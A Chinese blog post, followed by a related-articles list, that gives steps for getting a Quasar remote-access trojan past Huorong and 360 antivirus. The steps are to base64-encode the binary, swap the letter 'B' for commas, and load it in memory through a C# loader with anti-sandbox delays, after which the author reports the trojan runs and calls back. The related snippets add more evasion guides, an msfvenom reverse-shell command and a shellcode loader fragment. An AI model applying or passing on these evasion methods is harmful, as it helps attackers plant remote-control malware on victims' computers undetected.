简单免杀过火绒、360极速版

已于 2023-03-07 11:59:15 修改
阅读量2.2k 收藏 5
点赞数
分类专栏: Windows病毒分析 文章标签: 火绒安全
于 2023-03-03 17:48:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43312649/article/details/129324348
版权
本文介绍了如何通过修改程序的十六进制并使用C#加载器在内存中运行,以避免静态查杀,实现马子(恶意软件)在火绒和360极速版安全软件的检测下成功运行。尽管可能无法逃避所有动态防御,但在测试环境中,该方法能确保程序在安全软件安装且联网的情况下运行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

绝大多数情况马子是在静态时被杀的,如果在内存中运行起来后无法被及时扫描到,那就不用担心了。

Quasar这个最常见的远控,基本用C#工具混淆、加弱壳都没有太好的免杀效果。

一、首先编译出来马子,这个马子可以过不了静态,但是接下来的处理基本上静态查杀无解。
在这里插入图片描述

二、把马子的十六进制复制成base64模式,并且把base64编码中所有的大写字母“B”替换成“,”,这样完全去除静态特征。
在这里插入图片描述
三、由于马子的源代码是用C#编写的,这里用C#加载器最简单。
加载器要做的事情就是把上面这个文件释放出来并在内存中恢复成PE并加载到内存中(不会写在磁盘上)。当然加载器也可以添加一些延时功能来反沙箱分析,测试网络是否连接的一些代码。
在这里插入图片描述

4、测试下效果,结果在火绒和360极速版都安装且联网的情况下,是可以跑起来上线的。

360企业版主动防御引擎能否拦截C#的Assembly.Load方法并扫描出木马原型,这个未测试。

Chrome双核浏览器是借用谷歌Chrome关键词 在搜索引擎里面博取流量的一个山寨浏览器。——中间带E字是山寨的,不带e的是正宗的,要用正宗的。还有很多山寨的,如极速浏览器
qq_15963745的博客
05-21 589
补充相关内容使词条更完整,还能快速升级,赶紧来编辑吧!双核浏览器,就是有两个内核的浏览器。由于。
mimikatz杀过360火绒
qq_44905657的博客
12-28 2258
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查的几率极高。 1、方式 对mimikatz我们进行源码。源码只需要定位源码中的特征代码进行修改就可以达到预期的效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、处理 我们访问https://github.com/genti
杀过火绒
sash1mi
02-04 2444
杀过火绒 接上篇文章《杀过360全家桶》 https://blog.youkuaiyun.com/weixin_46676743/article/details/113350500 1.cs建立监听 2.生成payload 3.将生成的payload放到kali里编译 4.FourEye编译 项目地址与具体使用方法: https://github.com/lengjibo/FourEye 注意:一定要按照此工具的编译规则install gcc!! 5.火绒 360 6.cs上线 .
黑客零基础入门之技术,一文详解基础知识分享!
最新发布
白帽阿叁的博客
03-12 1239
本文主要介绍了常见毒技术与技术的基础概念,以及一些常见技术的实现手法。技术可深可浅,刚接触并想深入学习的同学建议从汇编语言、Windows编程等基础学起。如果只作为自己众多技术点中的一环,希望拿来就能用的话,建议直接使用ShellCode加载器,简单高效,但要注意时效性噢。给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
绕过软(二)——exe文件(360火绒
热门推荐
W小哥
06-12 2万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360毒,直接报毒,不 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
利用360软件设置的360终极.绝对过360
11-19
哼哼,研究了半年终于弄出了个利用360内部程序做的360.百分之百过360.... 希望大家采纳!!!!!
Bypass!可过WDF/360/火绒的C#混淆器
潇湘信安的博客
04-10 1019
一个可用于杀过WDF/360/火绒的C#混淆器,但只能混淆.Net Framework应用程序。
火绒阻止腾讯过度侵权行为,马化腾自查承认是团队违规,腾讯电脑管家道歉
miaozenn的博客
01-19 1992
0 网友爆料 QQ 读取浏览器的历史记录 1 月 15 日,有位程序员 mengyx 发帖称,发现 QQ 桌面尝试读取浏览器历史记录。 这事在圈子开始引发议论。 C/C++的学习裙【七一二二八四七零五】,无论你是小白还是进阶者,是想转行还是想入行都可以来了解一起进步一起学习!裙内有开发工具,很多干货和技术资料分享! 1 程序员验证发现:不止读取 Chrome 浏览器 1 月 17 日,另外一个程序员 qwqdanchun 起初不太相信,...
2022年电脑毒软件PK
anquanfun的博客
10-09 1万+
针对目前国内外比较流行的10款毒软件及其好用的组合方式展开介绍分析,希望既能起到好的毒效果,又能不被过多打扰。
QQ 正在尝试读取你的浏览记录?这是“火绒拦截腾讯产品,腾讯道歉”的历史重现吗?
Hsuesh的博客
01-20 3362
QQ 正在尝试读取你的浏览记录 近日,一篇题目为《QQ 正在尝试读取你的浏览记录》引发了网友们广泛关注,内容是网友@mengyx 在使用 QQ 时,为了防止一些流氓行为,特地去的 MS Store 里面安装的 QQ 桌面,因为之前使用了火绒的自定义拦截功能,设置了一些重要或敏感数据目录的保护,竟意外的发现 QQ 正在尝试读取他的浏览器。 拦截日志如下: 附言 : 21 小时 36 分钟前以 History 为关键字,最早可以追溯到9.1.5本(2019年6月),这么说此种行...
使用msfvenom火绒
2301_76718200的博客
11-11 1371
本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win。2、再使用msfvenom生成一个捆绑可以被windows执行的exe木马文件。3、把刚刚生成的exe木马文件传输到我们的win11物理机上。1、首先到火绒官网上下载个火绒安装包后放到kali中。#修改成我们之前生成木马时使用的payload。前提把软关闭要不然会掉,没有做的木马。靶机,启动火绒点击我们编译过的木马程序。点击后就连接上我们的kali攻击机了。#设置kali的IP地址为监听地址。
易语言一键过,过360. (加壳)
10-21
Esprotect3.9.exe 易语言一键过,过360. (加壳)
一键360四引擎
11-19
360360360360360360360360360360360360360360360360360360360360360
360技术视频教程|特征码修改和定位|不用数字签名轻松解决报毒问题
05-17
360目前越来越无情了,及时是没有毒的软件,也会报毒。这套视频教程正能助你一臂之力,让你在无签名下不被报毒。
并完美过360提示教程
12-07
饭客网络 叮噹出品 保证无毒 欢迎下载 避河蟹 名字没有给全 大家自己下载吧!
360过主动防御加入白名单代码放出
08-04
杀过360主动防御加入白名单代码放出 仍痛割爱的放出来 象征性的收些分吧 希望大家珍惜
杀过360全家桶
sash1mi
01-28 4137
杀过360全家桶 1.kali生成一串shellcode msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=kali的ip地址 LPORT=随便写个端口号(8888、9999都阔以) -f c 2.VS编写程序 这里给出代码 #include <windows.h> #include <stdio.h> (这里是我生成的shellcode) unsigned char
360安全卫士
qq_43647462的博客
11-15 854
绕过360安全卫士(无法绕过火绒) Buchiyexiao #include <windows.h> #include <stdio.h> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口 unsigned char shellcode[] = "veil_shellcode"; void main() { LPVOID Memory = VirtualAlloc
shellcode之360安全卫士(shecodject)(一)
ZPFCD的博客
07-16 962
shellcode
kali木马火绒
10-07
k木马火绒是指在kali系统中使用火绒进行木马的操作。火绒是一款知名的安全防护软件,可以帮助检测和阻止恶意软件的运行。然而,针对火绒技术是不断发展和变化的,所以具体的方法可能会有所不同。在使用kali进行木马时,您可以尝试以下方法: 1. 使用加壳工具:加壳工具可以将木马程序进行加密和混淆,从而绕过火绒的检测。您可以使用工具如shelter来对木马程序进行加壳操作,以增加木马的能力。 2. 修改木马特征:火绒通常会根据木马程序的特征进行识别和拦截,所以您可以修改木马的特征,使其不易被火绒检测到。例如,您可以修改木马的关键函数或变量名称,或者使用代码混淆技术来增加木马的能力。 3. 使用工具:kali系统中有一些专门用于木马的工具,您可以尝试使用这些工具来生成的木马程序。例如,您可以使用powerstager等工具来生成的木马,然后再进行火绒的测试。 总之,木马是一个不断演进和变化的领域,没有绝对的方法。在进行操作时,建议您时刻关注最新的技术和工具,并保持对火绒等防护软件的了解,以提高木马的能力。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

摔不死的笨鸟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值